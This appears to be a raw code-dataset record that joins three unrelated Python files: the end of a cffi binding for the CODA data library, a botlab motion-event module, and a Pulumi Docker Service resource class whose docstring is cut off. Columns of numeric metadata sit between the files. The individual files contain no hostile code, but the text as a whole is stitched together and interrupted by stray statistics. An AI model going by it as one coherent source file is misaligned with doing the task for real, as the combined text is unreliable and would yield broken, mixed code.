\x23coda_time_double_to_parts',0,b'\x00\x01\xF0\x23coda_time_double_to_parts_utc',0,b'\x00\x01\xEB\x23coda_time_double_to_string',0,b'\x00\x01\xEB\x23coda_time_double_to_string_utc',0,b'\x00\x02\x08\x23coda_time_parts_to_double',0,b'\x00\x02\x08\x23coda_time_parts_to_double_utc',0,b'\x00\x01\xFD\x23coda_time_parts_to_string',0,b'\x00\x00\x2A\x23coda_time_string_to_double',0,b'\x00\x00\x2A\x23coda_time_string_to_double_utc',0,b'\x00\x00\x2F\x23coda_time_string_to_parts',0,b'\x00\x01\xE7\x23coda_time_to_string',0,b'\x00\x01\xE7\x23coda_time_to_utcstring',0,b'\x00\x01\xB0\x23coda_type_get_array_base_type',0,b'\x00\x01\xC8\x23coda_type_get_array_dim',0,b'\x00\x01\xC4\x23coda_type_get_array_num_dims',0,b'\x00\x01\xB0\x23coda_type_get_attributes',0,b'\x00\x01\xCD\
x23coda_type_get_bit_size',0,b'\x00\x01\xC0\x23coda_type_get_class',0,b'\x00\x00\x0C\x23coda_type_get_class_name',0,b'\x00\x01\xA2\x23coda_type_get_description',0,b'\x00\x01\xA6\x23coda_type_get_fixed_value',0,b'\x00\x01\xB4\x23coda_type_get_format',0,b'\x00\x00\x03\x23coda_type_get_format_name',0,b'\x00\x01\xA2\x23coda_type_get_name',0,b'\x00\x00\x06\x23coda_type_get_native_type_name',0,b'\x00\x01\xD1\x23coda_type_get_num_record_fields',0,b'\x00\x01\xB8\x23coda_type_get_read_type',0,b'\x00\x01\xDF\x23coda_type_get_record_field_available_status',0,b'\x00\x01\xDF\x23coda_type_get_record_field_hidden_status',0,b'\x00\x01\xAB\x23coda_type_get_record_field_index_from_name',0,b'\x00\x01\xAB\x23coda_type_get_record_field_index_from_real_name',0,b'\x00\x01\xD5\x23coda_type_get_record_field_name',0,b'\x00\x01\xD5\x23coda_type_get_record_field_real_name',0,b'\x00\x01\xDA\x23coda_type_get_record_field_type',0,b'\x00\x01\xC4\x23coda_type_get_record_union_status',0,b'\x00\x01\xB0\x23coda_type_get_special_base_type',0,b'\x00\x01\xBC\x23coda_type_get_special_type',0,b'\x00\x00\x09\x23coda_type_get_special_type_name',0,b'\x00\x01\xD1\x23coda_type_get_string_length',0,b'\x00\x01\xA2\x23coda_type_get_unit',0,b'\x00\x01\xC4\x23coda_type_has_attributes',0,b'\x00\x02\x08\x23coda_utcdatetime_to_double',0,b'\x00\x00\x42\x23coda_utcstring_to_time',0),
_struct_unions = ((b'\x00\x00\x02\x37\x00\x00\x00\x02$1',b'\x00\x00\x4A\x11type',b'\x00\x00\x6D\x11index',b'\x00\x01\x5A\x11bit_offset'),(b'\x00\x00\x02\x2E\x00\x00\x00\x02$coda_cursor',b'\x00\x00\x64\x11product',b'\x00\x00\x10\x11n',b'\x00\x02\x38\x11stack'),(b'\x00\x00\x02\x30\x00\x00\x00\x10$coda_product',),(b'\x00\x00\x02\x32\x00\x00\x00\x10$coda_type',),(b'\x00\x00\x02\x2F\x00\x00\x00\x10coda_expression_struct',)),
_enums = (b'\x00\x00\x00\x76\x00\x00\x00\x16coda_array_ordering_enum\x00coda_array_ordering_c,coda_array_ordering_fortran',b'\x00\x00\x00\x01\x00\x00\x00\x16coda_expression_type_enum\x00coda_expression_boolean,coda_expression_integer,coda_expression_float,coda_expression_string,coda_expression_node,coda_expression_void',b'\x00\x00\x00\x48\x00\x00\x00\x16coda_filefilter_status_enum\x00coda_ffs_error,coda_ffs_could_not_open_file,coda_ffs_could_not_access_directory,coda_ffs_unsupported_file,coda_ffs_match,coda_ffs_no_match',b'\x00\x00\x00\x04\x00\x00\x00\x16coda_format_enum\x00coda_format_ascii,coda_format_binary,coda_format_xml,coda_format_hdf4,coda_format_hdf5,coda_format_cdf,coda_format_netcdf,coda_format_grib,coda_format_rinex,coda_format_sp3',b'\x00\x00\x00\x07\x00\x00\x00\x15coda_native_type_enum\x00coda_native_type_not_available,coda_native_type_int8,coda_native_type_uint8,coda_native_type_int16,coda_native_type_uint16,coda_native_type_int32,coda_native_type_uint32,coda_native_type_int64,coda_native_type_uint64,coda_native_type_float,coda_native_type_double,coda_native_type_char,coda_native_type_string,coda_native_type_bytes',b'\x00\x00\x00\x0A\x00\x00\x00\x16coda_special_type_enum\x00coda_special_no_data,coda_special_vsf_integer,coda_special_time,coda_special_complex',b'\x00\x00\x00\x0D\x00\x00\x00\x16coda_type_class_enum\x00coda_record_class,coda_array_class,coda_integer_class,coda_real_class,coda_text_class,coda_raw_class,coda_special_class'),
_typenames = (b'\x00\x00\x00\x76coda_array_ordering',b'\x00\x00\x02\x2Ecoda_cursor',b'\x00\x00\x02\x2Fcoda_expression',b'\x00\x00\x00\x01coda_expression_type',b'\x00\x00\x00\x48coda_filefilter_status',b'\x00\x00\x00\x04coda_format',b'\x00\x00\x00\x07coda_native_type',b'\x00\x00\x02\x30coda_product',b'\x00\x00\x00\x0Acoda_special_type',b'\x00\x00\x02\x32coda_type',b'\x00\x00\x00\x0Dcoda_type_class'),
)
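
# ---------------------------------------------------------------------------
# Hedged usage sketch (not emitted by cffi): this module is out-of-line,
# ABI-mode cffi output -- the packed `_types`/`_globals`/`_enums` byte strings
# above are decoded by _cffi_backend at import time, with no C compiler
# involved. A consumer imports `ffi` and opens the CODA shared library itself;
# the soname "libcoda.so" below is an assumption.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    lib = ffi.dlopen("libcoda.so")  # assumed location of the CODA C library
    # Integer constants from _globals (e.g. CODA_SUCCESS == 0) are exposed as
    # attributes of `lib`, alongside the declared functions.
    if lib.coda_init() != lib.CODA_SUCCESS:
        raise RuntimeError("CODA initialisation failed")
    try:
        pass  # lib.coda_open(...), cursor reads, etc. would go here
    finally:
        lib.coda_done()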
| 1,969.916667
| 12,019
| 0.799103
| 5,134
| 23,639
| 3.472926
| 0.075185
| 0.261806
| 0.097925
| 0.080763
| 0.703085
| 0.657263
| 0.572406
| 0.495681
| 0.42479
| 0.390297
| 0
| 0.267775
| 0.0022
| 23,639
| 11
| 12,020
| 2,149
| 0.48815
| 0.000804
| 0
| 0
| 1
| 0.777778
| 0.919976
| 0.918156
| 0
| 1
| 0.000254
| 0
| 0
| 1
| 0
| false
| 0.111111
| 0.111111
| 0
| 0.111111
| 0.111111
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
8634f7c39c35400e3d876b8b72684e5f3d408f25
| 1,813
|
py
|
Python
|
com.ppc.Bot/signals/motion.py
|
peoplepower/botlab
|
21cc90c558a17b7ef4a42bca247b437d2f968dc0
|
[
"Apache-2.0"
] | 16
|
2017-03-31T04:41:51.000Z
|
2020-07-15T07:03:06.000Z
|
com.ppc.Bot/signals/motion.py
|
peoplepower/botlab
|
21cc90c558a17b7ef4a42bca247b437d2f968dc0
|
[
"Apache-2.0"
] | 4
|
2018-07-03T05:39:36.000Z
|
2018-07-06T02:59:32.000Z
|
com.ppc.Bot/signals/motion.py
|
peoplepower/botlab
|
21cc90c558a17b7ef4a42bca247b437d2f968dc0
|
[
"Apache-2.0"
] | 8
|
2017-04-01T21:07:59.000Z
|
2019-09-18T15:23:37.000Z
|
"""
Created on May 19, 2021
This file is subject to the terms and conditions defined in the
file 'LICENSE.txt', which is part of this source code package.
@author: David Moss
"""
def did_start_detecting_motion(botengine, location_object, device_object):
"""
Device did start detecting motion
:param botengine: BotEngine environment
:param location_object: Location object
:param device_object: Device object that started detecting motion
"""
# Note this cannot be distributed externally because we're passing the device_object directly as an argument.
location_object.distribute_datastream_message(botengine, "did_start_detecting_motion", device_object, internal=True, external=False)
def did_stop_detecting_motion(botengine, location_object, device_object):
"""
Device did stop detecting motion
:param botengine: BotEngine environment
:param location_object: Location object
:param device_object: Device object that stopped detecting motion
"""
# Note this cannot be distributed externally because we're passing the device_object directly as an argument.
location_object.distribute_datastream_message(botengine, "did_stop_detecting_motion", device_object, internal=True, external=False)
def did_continue_detecting_motion(botengine, location_object, device_object):
"""
Device did continuously detecting motion
:param botengine: BotEngine environment
:param location_object: Location object
:param device_object: Device object that stopped detecting motion
"""
# Note this cannot be distributed externally because we're passing the device_object directly as an argument.
location_object.distribute_datastream_message(botengine, "did_continue_detecting_motion", device_object, internal=True, external=False)
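
# ---------------------------------------------------------------------------
# Hedged sketch (not part of this signals module): because the messages above
# are distributed with internal=True, they are delivered in-process to the
# location's microservices. A listener would look roughly like the class
# below; the base-class import path and the datastream_updated() hook are
# assumptions drawn from how botlab microservices are commonly wired.
# ---------------------------------------------------------------------------
# from intelligence.intelligence import Intelligence
#
# class LocationMotionMicroservice(Intelligence):
#
#     def datastream_updated(self, botengine, address, content):
#         # `content` is the device_object forwarded by the signals above.
#         if address == "did_start_detecting_motion":
#             botengine.get_logger().info("Motion started: {}".format(content.description))
#         elif address == "did_stop_detecting_motion":
#             botengine.get_logger().info("Motion stopped: {}".format(content.description))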
| 41.204545
| 139
| 0.785438
| 229
| 1,813
| 6.021834
| 0.279476
| 0.130529
| 0.078318
| 0.050036
| 0.854242
| 0.854242
| 0.854242
| 0.854242
| 0.816534
| 0.68818
| 0
| 0.003919
| 0.155543
| 1,813
| 43
| 140
| 42.162791
| 0.896799
| 0.576944
| 0
| 0
| 0
| 0
| 0.118343
| 0.118343
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
863bd6abc35869b6e4b3ffe069b2b2b69b206f1b
| 27,820
|
py
|
Python
|
sdk/python/pulumi_docker/service.py
|
koper89/pulumi-docker
|
e9c24218e1ac9de68e1156ee6d7484a51cfd501e
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_docker/service.py
|
koper89/pulumi-docker
|
e9c24218e1ac9de68e1156ee6d7484a51cfd501e
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_docker/service.py
|
koper89/pulumi-docker
|
e9c24218e1ac9de68e1156ee6d7484a51cfd501e
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from . import utilities, tables
class Service(pulumi.CustomResource):
    auth: pulumi.Output[dict]
    """
    See Auth below for details.

    * `password` (`str`) - The password to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_PASS` will also be checked.
    * `server_address` (`str`) - The address of the registry server
    * `username` (`str`) - The username to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_USER` will also be checked.
    """
    converge_config: pulumi.Output[dict]
    """
    See Converge Config below for details.

    * `delay` (`str`)
    * `timeout` (`str`)
    """
    endpoint_spec: pulumi.Output[dict]
    """
    See EndpointSpec below for details.

    * `mode` (`str`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
    * `ports` (`list`) - See Ports below for details.
      * `name` (`str`) - A random name for the port.
      * `protocol` (`str`) - Protocol that can be used over this port: `tcp|udp|sctp`. Default: `tcp`.
      * `publishMode` (`str`) - Represents the mode in which the port is to be published: `ingress|host`
      * `publishedPort` (`float`) - The port on the swarm hosts. If not set the value of `target_port` will be used.
      * `targetPort` (`float`) - Port inside the container.
    """
    labels: pulumi.Output[dict]
    mode: pulumi.Output[dict]
    """
    The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.

    * `global` (`bool`)
    * `replicated` (`dict`)
      * `replicas` (`float`)
    """
    name: pulumi.Output[str]
    """
    A random name for the port.
    """
    rollback_config: pulumi.Output[dict]
    """
    See RollbackConfig below for details.

    * `delay` (`str`)
    * `failureAction` (`str`)
    * `maxFailureRatio` (`str`)
    * `monitor` (`str`)
    * `order` (`str`)
    * `parallelism` (`float`)
    """
    task_spec: pulumi.Output[dict]
    """
    See TaskSpec below for details.

    * `containerSpec` (`dict`)
      * `args` (`list`)
      * `commands` (`list`)
      * `configs` (`list`)
        * `configId` (`str`) - ConfigID represents the ID of the specific config.
        * `configName` (`str`) - The name of the config that this references, but internally it is just provided for lookup/display purposes
        * `fileName` (`str`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
      * `dir` (`str`)
      * `dnsConfig` (`dict`)
        * `nameservers` (`list`)
        * `options` (`list`) - The options for the logging driver, e.g.
        * `searches` (`list`)
      * `env` (`dict`)
      * `groups` (`list`)
      * `healthcheck` (`dict`)
        * `interval` (`str`)
        * `retries` (`float`)
        * `startPeriod` (`str`)
        * `tests` (`list`)
        * `timeout` (`str`)
      * `hostname` (`str`)
      * `hosts` (`list`)
        * `host` (`str`)
        * `ip` (`str`)
      * `image` (`str`)
      * `isolation` (`str`)
      * `labels` (`dict`)
      * `mounts` (`list`)
        * `bindOptions` (`dict`)
          * `propagation` (`str`)
        * `read_only` (`bool`)
        * `source` (`str`)
        * `target` (`str`)
        * `tmpfsOptions` (`dict`)
          * `mode` (`float`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
          * `sizeBytes` (`float`)
        * `type` (`str`)
        * `volumeOptions` (`dict`)
          * `driverName` (`str`)
          * `driverOptions` (`dict`)
          * `labels` (`dict`)
          * `noCopy` (`bool`)
      * `privileges` (`dict`)
        * `credentialSpec` (`dict`)
          * `file` (`str`)
          * `registry` (`str`)
        * `seLinuxContext` (`dict`)
          * `disable` (`bool`)
          * `level` (`str`)
          * `role` (`str`)
          * `type` (`str`)
          * `user` (`str`)
      * `read_only` (`bool`)
      * `secrets` (`list`)
        * `fileName` (`str`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
        * `secretId` (`str`)
        * `secretName` (`str`)
      * `stopGracePeriod` (`str`)
      * `stopSignal` (`str`)
      * `user` (`str`)
    * `forceUpdate` (`float`)
    * `log_driver` (`dict`)
      * `name` (`str`) - A random name for the port.
      * `options` (`dict`) - The options for the logging driver, e.g.
    * `networks` (`list`)
    * `placement` (`dict`)
      * `constraints` (`list`)
      * `platforms` (`list`)
        * `architecture` (`str`)
        * `os` (`str`)
      * `prefs` (`list`)
    * `resources` (`dict`)
      * `limits` (`dict`)
        * `genericResources` (`dict`)
          * `discreteResourcesSpecs` (`list`)
          * `namedResourcesSpecs` (`list`)
        * `memoryBytes` (`float`)
        * `nanoCpus` (`float`)
      * `reservation` (`dict`)
        * `genericResources` (`dict`)
          * `discreteResourcesSpecs` (`list`)
          * `namedResourcesSpecs` (`list`)
        * `memoryBytes` (`float`)
        * `nanoCpus` (`float`)
    * `restartPolicy` (`dict`)
      * `condition` (`str`)
      * `delay` (`str`)
      * `maxAttempts` (`float`)
      * `window` (`str`)
    * `runtime` (`str`)
    """
    update_config: pulumi.Output[dict]
    """
    See UpdateConfig below for details.

    * `delay` (`str`)
    * `failureAction` (`str`)
    * `maxFailureRatio` (`str`)
    * `monitor` (`str`)
    * `order` (`str`)
    * `parallelism` (`float`)
    """
    def __init__(__self__, resource_name, opts=None, auth=None, converge_config=None, endpoint_spec=None, labels=None, mode=None, name=None, rollback_config=None, task_spec=None, update_config=None, __props__=None, __name__=None, __opts__=None):
        """
        Create a Service resource with the given unique name, props, and options.

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[dict] auth: See Auth below for details.
        :param pulumi.Input[dict] converge_config: See Converge Config below for details.
        :param pulumi.Input[dict] endpoint_spec: See EndpointSpec below for details.
        :param pulumi.Input[dict] mode: The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
        :param pulumi.Input[str] name: A random name for the port.
        :param pulumi.Input[dict] rollback_config: See RollbackConfig below for details.
        :param pulumi.Input[dict] task_spec: See TaskSpec below for details.
        :param pulumi.Input[dict] update_config: See UpdateConfig below for details.

        The **auth** object supports the following:

          * `password` (`pulumi.Input[str]`) - The password to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_PASS` will also be checked.
          * `server_address` (`pulumi.Input[str]`) - The address of the registry server
          * `username` (`pulumi.Input[str]`) - The username to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_USER` will also be checked.

        The **converge_config** object supports the following:

          * `delay` (`pulumi.Input[str]`)
          * `timeout` (`pulumi.Input[str]`)

        The **endpoint_spec** object supports the following:

          * `mode` (`pulumi.Input[str]`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
          * `ports` (`pulumi.Input[list]`) - See Ports below for details.
            * `name` (`pulumi.Input[str]`) - A random name for the port.
            * `protocol` (`pulumi.Input[str]`) - Protocol that can be used over this port: `tcp|udp|sctp`. Default: `tcp`.
            * `publishMode` (`pulumi.Input[str]`) - Represents the mode in which the port is to be published: `ingress|host`
            * `publishedPort` (`pulumi.Input[float]`) - The port on the swarm hosts. If not set the value of `target_port` will be used.
            * `targetPort` (`pulumi.Input[float]`) - Port inside the container.

        The **mode** object supports the following:

          * `global` (`pulumi.Input[bool]`)
          * `replicated` (`pulumi.Input[dict]`)
            * `replicas` (`pulumi.Input[float]`)

        The **rollback_config** object supports the following:

          * `delay` (`pulumi.Input[str]`)
          * `failureAction` (`pulumi.Input[str]`)
          * `maxFailureRatio` (`pulumi.Input[str]`)
          * `monitor` (`pulumi.Input[str]`)
          * `order` (`pulumi.Input[str]`)
          * `parallelism` (`pulumi.Input[float]`)

        The **task_spec** object supports the following:

          * `containerSpec` (`pulumi.Input[dict]`)
            * `args` (`pulumi.Input[list]`)
            * `commands` (`pulumi.Input[list]`)
            * `configs` (`pulumi.Input[list]`)
              * `configId` (`pulumi.Input[str]`) - ConfigID represents the ID of the specific config.
              * `configName` (`pulumi.Input[str]`) - The name of the config that this references, but internally it is just provided for lookup/display purposes
              * `fileName` (`pulumi.Input[str]`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
            * `dir` (`pulumi.Input[str]`)
            * `dnsConfig` (`pulumi.Input[dict]`)
              * `nameservers` (`pulumi.Input[list]`)
              * `options` (`pulumi.Input[list]`) - The options for the logging driver, e.g.
              * `searches` (`pulumi.Input[list]`)
            * `env` (`pulumi.Input[dict]`)
            * `groups` (`pulumi.Input[list]`)
            * `healthcheck` (`pulumi.Input[dict]`)
              * `interval` (`pulumi.Input[str]`)
              * `retries` (`pulumi.Input[float]`)
              * `startPeriod` (`pulumi.Input[str]`)
              * `tests` (`pulumi.Input[list]`)
              * `timeout` (`pulumi.Input[str]`)
            * `hostname` (`pulumi.Input[str]`)
            * `hosts` (`pulumi.Input[list]`)
              * `host` (`pulumi.Input[str]`)
              * `ip` (`pulumi.Input[str]`)
            * `image` (`pulumi.Input[str]`)
            * `isolation` (`pulumi.Input[str]`)
            * `labels` (`pulumi.Input[dict]`)
            * `mounts` (`pulumi.Input[list]`)
              * `bindOptions` (`pulumi.Input[dict]`)
                * `propagation` (`pulumi.Input[str]`)
              * `read_only` (`pulumi.Input[bool]`)
              * `source` (`pulumi.Input[str]`)
              * `target` (`pulumi.Input[str]`)
              * `tmpfsOptions` (`pulumi.Input[dict]`)
                * `mode` (`pulumi.Input[float]`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
                * `sizeBytes` (`pulumi.Input[float]`)
              * `type` (`pulumi.Input[str]`)
              * `volumeOptions` (`pulumi.Input[dict]`)
                * `driverName` (`pulumi.Input[str]`)
                * `driverOptions` (`pulumi.Input[dict]`)
                * `labels` (`pulumi.Input[dict]`)
                * `noCopy` (`pulumi.Input[bool]`)
            * `privileges` (`pulumi.Input[dict]`)
              * `credentialSpec` (`pulumi.Input[dict]`)
                * `file` (`pulumi.Input[str]`)
                * `registry` (`pulumi.Input[str]`)
              * `seLinuxContext` (`pulumi.Input[dict]`)
                * `disable` (`pulumi.Input[bool]`)
                * `level` (`pulumi.Input[str]`)
                * `role` (`pulumi.Input[str]`)
                * `type` (`pulumi.Input[str]`)
                * `user` (`pulumi.Input[str]`)
            * `read_only` (`pulumi.Input[bool]`)
            * `secrets` (`pulumi.Input[list]`)
              * `fileName` (`pulumi.Input[str]`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
              * `secretId` (`pulumi.Input[str]`)
              * `secretName` (`pulumi.Input[str]`)
            * `stopGracePeriod` (`pulumi.Input[str]`)
            * `stopSignal` (`pulumi.Input[str]`)
            * `user` (`pulumi.Input[str]`)
          * `forceUpdate` (`pulumi.Input[float]`)
          * `log_driver` (`pulumi.Input[dict]`)
            * `name` (`pulumi.Input[str]`) - A random name for the port.
            * `options` (`pulumi.Input[dict]`) - The options for the logging driver, e.g.
          * `networks` (`pulumi.Input[list]`)
          * `placement` (`pulumi.Input[dict]`)
            * `constraints` (`pulumi.Input[list]`)
            * `platforms` (`pulumi.Input[list]`)
              * `architecture` (`pulumi.Input[str]`)
              * `os` (`pulumi.Input[str]`)
            * `prefs` (`pulumi.Input[list]`)
          * `resources` (`pulumi.Input[dict]`)
            * `limits` (`pulumi.Input[dict]`)
              * `genericResources` (`pulumi.Input[dict]`)
                * `discreteResourcesSpecs` (`pulumi.Input[list]`)
                * `namedResourcesSpecs` (`pulumi.Input[list]`)
              * `memoryBytes` (`pulumi.Input[float]`)
              * `nanoCpus` (`pulumi.Input[float]`)
            * `reservation` (`pulumi.Input[dict]`)
              * `genericResources` (`pulumi.Input[dict]`)
                * `discreteResourcesSpecs` (`pulumi.Input[list]`)
                * `namedResourcesSpecs` (`pulumi.Input[list]`)
              * `memoryBytes` (`pulumi.Input[float]`)
              * `nanoCpus` (`pulumi.Input[float]`)
          * `restartPolicy` (`pulumi.Input[dict]`)
            * `condition` (`pulumi.Input[str]`)
            * `delay` (`pulumi.Input[str]`)
            * `maxAttempts` (`pulumi.Input[float]`)
            * `window` (`pulumi.Input[str]`)
          * `runtime` (`pulumi.Input[str]`)

        The **update_config** object supports the following:

          * `delay` (`pulumi.Input[str]`)
          * `failureAction` (`pulumi.Input[str]`)
          * `maxFailureRatio` (`pulumi.Input[str]`)
          * `monitor` (`pulumi.Input[str]`)
          * `order` (`pulumi.Input[str]`)
          * `parallelism` (`pulumi.Input[float]`)

        > This content is derived from https://github.com/terraform-providers/terraform-provider-docker/blob/master/website/docs/r/service.html.markdown.
        """
        if __name__ is not None:
            warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
            resource_name = __name__
        if __opts__ is not None:
            warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
            opts = __opts__
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = dict()

            __props__['auth'] = auth
            __props__['converge_config'] = converge_config
            __props__['endpoint_spec'] = endpoint_spec
            __props__['labels'] = labels
            __props__['mode'] = mode
            __props__['name'] = name
            __props__['rollback_config'] = rollback_config
            if task_spec is None:
                raise TypeError("Missing required property 'task_spec'")
            __props__['task_spec'] = task_spec
            __props__['update_config'] = update_config
        super(Service, __self__).__init__(
            'docker:index/service:Service',
            resource_name,
            __props__,
            opts)
@staticmethod
def get(resource_name, id, opts=None, auth=None, converge_config=None, endpoint_spec=None, labels=None, mode=None, name=None, rollback_config=None, task_spec=None, update_config=None):
"""
Get an existing Service resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[dict] auth: See Auth below for details.
:param pulumi.Input[dict] converge_config: See Converge Config below for details.
:param pulumi.Input[dict] endpoint_spec: See EndpointSpec below for details.
:param pulumi.Input[dict] mode: The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
:param pulumi.Input[str] name: A random name for the port.
:param pulumi.Input[dict] rollback_config: See RollbackConfig below for details.
:param pulumi.Input[dict] task_spec: See TaskSpec below for details.
:param pulumi.Input[dict] update_config: See UpdateConfig below for details.
The **auth** object supports the following:
* `password` (`pulumi.Input[str]`) - The password to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_PASS` is also be checked.
* `server_address` (`pulumi.Input[str]`) - The address of the registry server
* `username` (`pulumi.Input[str]`) - The username to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_USER` is also be checked.
The **converge_config** object supports the following:
* `delay` (`pulumi.Input[str]`)
* `timeout` (`pulumi.Input[str]`)
The **endpoint_spec** object supports the following:
* `mode` (`pulumi.Input[str]`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
* `ports` (`pulumi.Input[list]`) - See Ports below for details.
* `name` (`pulumi.Input[str]`) - A random name for the port.
* `protocol` (`pulumi.Input[str]`) - Protocol that can be used over this port: `tcp|udp|sctp`. Default: `tcp`.
* `publishMode` (`pulumi.Input[str]`) - Represents the mode in which the port is to be published: `ingress|host`
* `publishedPort` (`pulumi.Input[float]`) - The port on the swarm hosts. If not set the value of `target_port` will be used.
* `targetPort` (`pulumi.Input[float]`) - Port inside the container.
The **mode** object supports the following:
* `global` (`pulumi.Input[bool]`)
* `replicated` (`pulumi.Input[dict]`)
* `replicas` (`pulumi.Input[float]`)
The **rollback_config** object supports the following:
* `delay` (`pulumi.Input[str]`)
* `failureAction` (`pulumi.Input[str]`)
* `maxFailureRatio` (`pulumi.Input[str]`)
* `monitor` (`pulumi.Input[str]`)
* `order` (`pulumi.Input[str]`)
* `parallelism` (`pulumi.Input[float]`)
The **task_spec** object supports the following:
* `containerSpec` (`pulumi.Input[dict]`)
* `args` (`pulumi.Input[list]`)
* `commands` (`pulumi.Input[list]`)
* `configs` (`pulumi.Input[list]`)
* `configId` (`pulumi.Input[str]`) - ConfigID represents the ID of the specific config.
* `configName` (`pulumi.Input[str]`) - The name of the config that this references, but internally it is just provided for lookup/display purposes
* `fileName` (`pulumi.Input[str]`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
* `dir` (`pulumi.Input[str]`)
* `dnsConfig` (`pulumi.Input[dict]`)
* `nameservers` (`pulumi.Input[list]`)
* `options` (`pulumi.Input[list]`) - The options for the logging driver, e.g.
* `searches` (`pulumi.Input[list]`)
* `env` (`pulumi.Input[dict]`)
* `groups` (`pulumi.Input[list]`)
* `healthcheck` (`pulumi.Input[dict]`)
* `interval` (`pulumi.Input[str]`)
* `retries` (`pulumi.Input[float]`)
* `startPeriod` (`pulumi.Input[str]`)
* `tests` (`pulumi.Input[list]`)
* `timeout` (`pulumi.Input[str]`)
* `hostname` (`pulumi.Input[str]`)
* `hosts` (`pulumi.Input[list]`)
* `host` (`pulumi.Input[str]`)
* `ip` (`pulumi.Input[str]`)
* `image` (`pulumi.Input[str]`)
* `isolation` (`pulumi.Input[str]`)
* `labels` (`pulumi.Input[dict]`)
* `mounts` (`pulumi.Input[list]`)
* `bindOptions` (`pulumi.Input[dict]`)
* `propagation` (`pulumi.Input[str]`)
* `read_only` (`pulumi.Input[bool]`)
* `source` (`pulumi.Input[str]`)
* `target` (`pulumi.Input[str]`)
* `tmpfsOptions` (`pulumi.Input[dict]`)
* `mode` (`pulumi.Input[float]`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
* `sizeBytes` (`pulumi.Input[float]`)
* `type` (`pulumi.Input[str]`)
* `volumeOptions` (`pulumi.Input[dict]`)
* `driverName` (`pulumi.Input[str]`)
* `driverOptions` (`pulumi.Input[dict]`)
* `labels` (`pulumi.Input[dict]`)
* `noCopy` (`pulumi.Input[bool]`)
* `privileges` (`pulumi.Input[dict]`)
* `credentialSpec` (`pulumi.Input[dict]`)
* `file` (`pulumi.Input[str]`)
* `registry` (`pulumi.Input[str]`)
* `seLinuxContext` (`pulumi.Input[dict]`)
* `disable` (`pulumi.Input[bool]`)
* `level` (`pulumi.Input[str]`)
* `role` (`pulumi.Input[str]`)
* `type` (`pulumi.Input[str]`)
* `user` (`pulumi.Input[str]`)
* `read_only` (`pulumi.Input[bool]`)
* `secrets` (`pulumi.Input[list]`)
* `fileName` (`pulumi.Input[str]`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
* `secretId` (`pulumi.Input[str]`)
* `secretName` (`pulumi.Input[str]`)
* `stopGracePeriod` (`pulumi.Input[str]`)
* `stopSignal` (`pulumi.Input[str]`)
* `user` (`pulumi.Input[str]`)
* `forceUpdate` (`pulumi.Input[float]`)
* `log_driver` (`pulumi.Input[dict]`)
* `name` (`pulumi.Input[str]`) - A random name for the port.
* `options` (`pulumi.Input[dict]`) - The options for the logging driver, e.g.
* `networks` (`pulumi.Input[list]`)
* `placement` (`pulumi.Input[dict]`)
* `constraints` (`pulumi.Input[list]`)
* `platforms` (`pulumi.Input[list]`)
* `architecture` (`pulumi.Input[str]`)
* `os` (`pulumi.Input[str]`)
